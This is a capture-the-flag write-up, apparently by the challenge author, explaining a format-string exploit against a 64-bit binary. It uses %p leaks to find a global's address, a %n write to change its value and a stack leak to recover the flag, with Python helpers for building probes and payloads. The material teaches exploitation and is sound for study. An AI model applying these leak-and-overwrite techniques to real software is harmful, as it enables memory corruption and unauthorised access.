Author: d1g174l_f0r7r355
This was one of the hard challenges I made for inctfj qualifiers. It is based on format strings. I will try to explain all the concepts required and used in this challenge.
Preliminary checks:
It is a 64 bit, dynamically linked, non-stripped binary.
All protections are enabled for this challenge, so a simple buffer overflow or shellcode injection is ruled out and we have to find some other way to pwn it. The source code was provided along with the challenge, so let's first analyze it in detail to understand what the program is actually doing.
Source Code analysis:
Firstly, let us look into what main() is doing!
- The main() function takes a character as input. Depending on that input, the functions check_leaks(), call_plumber() and buy_repair_kit() are called respectively. Note also that main() runs in an infinite while loop, meaning we can call each of these functions as many times as we like. Now let's analyze what happens when each function is called for our input choice.
check_leaks():
One input choice in main() calls check_leaks(). What happens here, and are there any vulnerabilities in this function? If so, how can we exploit them? To answer these questions, let's look at the function in the given source code. As the source shows, check_leaks() prints the balance in your account and asks where you would like to check your leaks. fgets() then reads the user input (with a size limit of 100 bytes) into a buffer, and that buffer is printed straight back by passing it to printf() as the format string. Why is this a vulnerability? To understand that, let's dive into the concept of format strings!
Format Strings :
What are format strings?
If we look at the manual page of the printf() function in C, a format string is defined as:
"The format string is a character string, beginning and ending in its initial shift state, if any. The format string is composed of zero or more directives: ordinary characters (not %), which are copied unchanged to the output stream; and conversion specifications, each of which results in fetching zero or more subsequent arguments. Each conversion specification is introduced by the character %, and ends with a conversion specifier."
So what does it mean?
Let's consider an example!
A familiar, widely used way of calling printf() looks something like this:
As we can see, the first parameter to printf() is the format string "%s", which says that a character string should be printed to the screen. The second parameter is a pointer to the location in memory where that string is stored, typically just the variable holding it.
Here, "%s" is called a format specifier, as it determines what kind of conversion is applied to the subsequent argument to produce suitable output (in this case, a character string). What are the other format specifiers?
Some other very commonly used format specifiers are:
Similarly:
Vulnerabilities?
In exploitation analysis we often find that C library functions can be misused, and that despite protections and compiler warnings it is sometimes still possible to overwrite memory and cause malicious behavior in a program.
printf() has such weaknesses too, which allow us to overwrite memory and cause that kind of behavior. One example is using printf() to overwrite the value stored at a chosen address.
As we know, printf() is normally called with at least two arguments: the first is a format string containing a format specifier and the second is the value or pointer it refers to. However, passing a character array containing the string "hello_world!" as the only argument to printf() also prints "hello_world!" to the screen. One may ask how this ordinary-looking behavior is a vulnerability. To understand more, let's consider a case where the argument to printf() is user controlled.
Example:
So what do we understand from the above three lines of code?
We see that the user inputs data into inpBuf, and the same character array is passed to printf() as its only argument, so the user's input becomes the format string. Now suppose the user gives "%p" or "%x" as input; what will be printed to the screen? Since printf() treats its first argument as a format string, it goes looking for an argument that was never passed and prints whatever happens to be where that argument would be. On a 64-bit Linux system the first six arguments are passed in registers (rdi, rsi, rdx, rcx, r8, r9) and the rest on the stack. The pointer to the format string itself is in rdi, so a single "%p" prints the value in rsi, a second "%p" prints rdx, and so on; once the registers are used up, the values come from the stack. A user can also pick an argument directly: "%4$p" prints the 4th argument after the format string as a pointer, and indices from 6 upwards read successive 8-byte slots on the stack. This is how printf() is abused to leak data.
We will thus make use of the above vulnerability to obtain leaks from memory and also write to memory in a similar manner. This will be discussed in the exploitation part of this writeup.
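To make the positional-argument idea concrete, here is a minimal Python sketch of how a probe string for such a leak could be generated and how the reply could be split back into indexed values. The helper names positional_probe and split_leaks are hypothetical and not part of the original exploit; the sketch only builds and parses strings and does not talk to the binary.

```python
def positional_probe(first: int, last: int, spec: str = "p") -> bytes:
    """Build a probe such as b'%1$p.%2$p.%3$p' covering arguments first..last."""
    if first < 1 or last < first:
        raise ValueError("expected 1 <= first <= last")
    # "%N$p" asks printf for its N-th argument after the format string.
    parts = [f"%{i}${spec}" for i in range(first, last + 1)]
    return ".".join(parts).encode()


def split_leaks(output: bytes, first: int = 1) -> dict:
    """Map argument index -> leaked token for a reply to positional_probe()."""
    tokens = output.strip().split(b".")
    return {i: tok.decode() for i, tok in enumerate(tokens, start=first)}


if __name__ == "__main__":
    # Hypothetical usage: this is what would be sent as the input string.
    print(positional_probe(1, 8))
```

Separating the values with dots keeps the reply easy to parse, since "%p" output never contains a dot. Keep in mind that the probe has to fit within the input size limit of the target.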
call_plumber():
Another input choice in main() calls call_plumber(). This function is of little significance to us, as it simply prints "Why must you call the plumber when you can fix the leak yourself?". Moving on!
buy_repair_kit():
The remaining input choice in main() calls buy_repair_kit(). This function is quite interesting: it first checks the value of the global variable bal. If the condition is satisfied it calls use_tapes(); otherwise it simply prints "You do not have enough balance! :(". Looking at bal, we can see that it is initialized to 100, whereas it needs to be 200 to pass the check. This means we need to find a way to overwrite bal with 200 so that use_tapes() is called. We will see more of this in the exploitation section of the writeup. For now, let's continue with understanding the source code.
use_tapes():
This function is only called by buy_repair_kit(), once the balance check is satisfied. It asks for our experience and prints it back using printf(). Another thing to notice is that the flag is read from a file into a variable but is never printed. Luckily for us, there is another format string vulnerability here: our input is again passed to printf() as the format string. Since we have understood how printf() can be used to leak data from memory, we will use the same concept here to leak the flag!
Exploitation:
Now that we have understood the binary and a few other concepts related to the challenge, our logic for exploitation is pretty simple:
- Call check_leaks() to leak the address of the global variable bal with the help of the format string vulnerability.
- Call check_leaks() again to change the value of the global variable bal from 100 to 200.
- Call buy_repair_kit() and pass the check, so that use_tapes() is called.
- Once use_tapes() is called, use its format string vulnerability to simply leak the flag!
Let's begin the exploit by going through each of the above four steps.
Leaking the address of the global variable "bal":
This might seem a bit tricky and confusing at first, but once we start to analyze and dig deeper it becomes clearer. We will be leaking the address of bal from the check_leaks() function. Let us assume our payload to be something of this sort:
With this payload, our output is:
Looking closely, the value at the 6th offset is nothing but our own input string. We also find many other addresses, such as libc or code addresses. We are, however, interested in the address leaked at the 18th offset. Why this address? Wherever our global variable is stored in memory, its offset from the code base address won't change. This holds not just for the code base: the offset from any given code address stays constant. The address of the global variable can be found in gdb (or one can simply use IDA or Ghidra). As we can see:
This gives us the address of the global variable bal for this particular run. Since the offset of the global variable from code_base, or from any code address for that matter, remains constant, we can use the leak obtained at the 18th offset above to find the address of bal. How? Find the offset of the variable from the leaked address once in the debugger, then add that offset to the value leaked at run time. The calculation looks like this:
As we can see, the global variable is located 0x2ab0 bytes above the address leaked at the 18th offset.
And so we have obtained the address of the variable bal.
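The arithmetic above can be sketched in a few lines of Python. The constant 0x2ab0 is the distance reported in this writeup; the example leak value and the helper name bal_address are made up for illustration, since the real leak differs on every run when PIE and ASLR are enabled.

```python
# Distance between the value leaked at the 18th offset and bal, as measured above.
BAL_OFFSET_FROM_LEAK = 0x2AB0


def bal_address(leaked: str) -> int:
    """Turn a '%18$p' style leak such as '0x5555...' into the address of bal."""
    leak = int(leaked, 16)  # int() accepts the leading "0x" when base is 16
    return leak + BAL_OFFSET_FROM_LEAK


if __name__ == "__main__":
    example_leak = "0x555555555560"  # hypothetical value, not taken from the challenge
    print(hex(bal_address(example_leak)))  # prints 0x555555558010
```

Because only the difference between the two addresses is fixed, the addition has to be repeated with a fresh leak each time the program is started.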
Overwriting the value of bal from 100 to 200:
Now that we have obtained the address of the global variable bal, our task is to overwrite it with 200. Since there are no other vulnerabilities in the program, we have to do the overwrite using format strings alone. We therefore call check_leaks() again, this time to write to memory. This can be done in 2 ways:
- Using fmtstr_payload() in pwntools.
- When using this built-in pwntools function, note that the offset we give is 6, since, as we saw above, our input string was found at offset 6. The address we give is that of the global variable bal, and the value is 200, since that is what we want to write. Thus our payload is something like:
- Using the %n format specifier.
- This can be a bit tricky, as it requires us to understand how %n works. %n prints nothing; instead it stores the number of characters printed so far into the variable whose address is given as the corresponding argument. So what does this mean? Let's consider an example:
Output obtained is: 13. Why? Because the number of characters printed before %n is 13. We shall use the same concept to write to memory.
When writing to memory, we must keep three things in mind: the offset, the address and the value to write. Our offset is 6, the address is that of the global variable bal obtained above, and the value is 200. Our payload will look something like this:
Here is how it looks in memory:
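The counting rule behind %n can be illustrated with a small Python model. This is only a sketch of the rule, not printf itself: the function count_before_n is hypothetical, and it deliberately understands just literal characters, "%%", "%c" with an optional width, and "%n" (optionally positional).

```python
import re

# One token at a time: %<width>c, %n or %<index>$n, an escaped %%, or a literal.
_TOKEN = re.compile(r"%(?P<width>\d*)c|(?P<store>%(?:\d+\$)?n)|%%|[^%]")


def count_before_n(fmt: str) -> int:
    """Return the value the first %n in fmt would store (simplified model)."""
    printed = 0
    pos = 0
    while pos < len(fmt):
        m = _TOKEN.match(fmt, pos)
        if m is None:
            raise ValueError(f"unsupported directive at index {pos}")
        if m.group("store") is not None:
            return printed  # %n stores the count and prints nothing
        if m.group("width") is not None:
            # %c prints one character, padded up to the field width if given
            printed += max(int(m.group("width") or 1), 1)
        else:
            printed += 1  # a literal character, or "%%" printing one '%'
        pos = m.end()
    raise ValueError("format contains no %n")


if __name__ == "__main__":
    print(count_before_n("hello, world!%n"))  # 13 characters come before %n
    print(count_before_n("%200c%8$n"))        # padding makes the count 200
```

The second call shows why a width such as "%200c" is convenient: it produces the desired count without having to send 200 literal characters.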

Thus we see that the address of bal sits at the 8th offset. Another way to work this out is from the stack itself: take the distance between the location where the address of bal is written and the location where our input string starts, both on the stack, and count it in 8-byte words from offset 6. Once the overwrite is done, we can inspect the value now stored in bal to verify it.
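As a rough illustration of the manual approach, the following Python sketch lays out a %n payload so that the target address lands on an 8-byte boundary after the format text. It is an assumption about how such a payload could be built, not the author's exact payload: build_n_write and arg_index are hypothetical helpers, the address used is made up, and the index formula is one reading of the calculation described above.

```python
import struct


def arg_index(input_offset: int, input_pos: int, addr_pos: int, word: int = 8) -> int:
    """Argument index of a stack slot, given where the input starts on the stack."""
    return input_offset + (addr_pos - input_pos) // word


def build_n_write(addr: int, value: int, input_offset: int = 6, word: int = 8) -> bytes:
    """Return b'%<value>c%<idx>$n' + padding + little-endian addr (single %n write)."""
    if value <= 0:
        raise ValueError("value must be positive for a %c-based write")
    slots = 1
    while True:
        # The address sits 'slots' words after the start of the input.
        fmt = f"%{value}c%{input_offset + slots}$n".encode()
        if len(fmt) <= slots * word:
            break
        slots += 1
    # Pad so the address is aligned; the padding is printed after %n and is harmless.
    padded = fmt.ljust(slots * word, b"A")
    # The address goes last because its zero bytes would end the format string.
    return padded + struct.pack("<Q", addr)


if __name__ == "__main__":
    payload = build_n_write(0x555555558010, 200)  # hypothetical address of bal
    print(payload)
```

With the input at offset 6 and a value of 200, the format text needs two 8-byte slots, which places the address at index 8, matching the offset observed above. Note that %n writes a 4-byte int, which is enough for a value like 200, and that an address containing a newline byte would be cut short by fgets().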
Obtain the flag:
Now that we have leaked from and written to memory, the check passes and use_tapes() is called, where our remaining task is simply to leak the flag. As shown above, we can use either a '%s' or a '%p' format specifier to leak the flag string. If we use '%p', we need to convert the leaked hex values back to a string (each value is little-endian, so its bytes appear reversed). To find the offset, let's send a string of '%p' specifiers and see where the flag sits on the stack. Output:
Thus we find our input string at the 8th offset, and, looking closely, the value leaked at the 16th offset is nothing but our flag! So to leak just the flag when running against the server, our payload only needs to reference the 16th offset.
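If the flag is leaked with '%p', the hex values have to be turned back into text. The sketch below shows one way to do that in Python, assuming consecutive 8-byte little-endian words; decode_p_leaks is a hypothetical helper and the sample values encode a made-up flag, not the real one.

```python
def decode_p_leaks(tokens) -> str:
    """Join '%p' outputs (e.g. '0x746d...') into the string they contain."""
    out = b""
    for tok in tokens:
        if tok == "(nil)":  # glibc prints a zero pointer as "(nil)"
            break
        # Each leaked word holds 8 bytes of the string in little-endian order.
        out += int(tok, 16).to_bytes(8, "little")
    # Stop at the first NUL, just as a C string would.
    return out.split(b"\x00", 1)[0].decode(errors="replace")


if __name__ == "__main__":
    # Hypothetical leak of two consecutive stack words.
    sample = ["0x746d667b67616c66", "0x7d676e317274735f"]
    print(decode_p_leaks(sample))  # prints flag{fmt_str1ng}
```

A flag longer than 8 bytes spans several consecutive offsets, so in practice the offsets following the first one would be leaked as well and passed in order.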
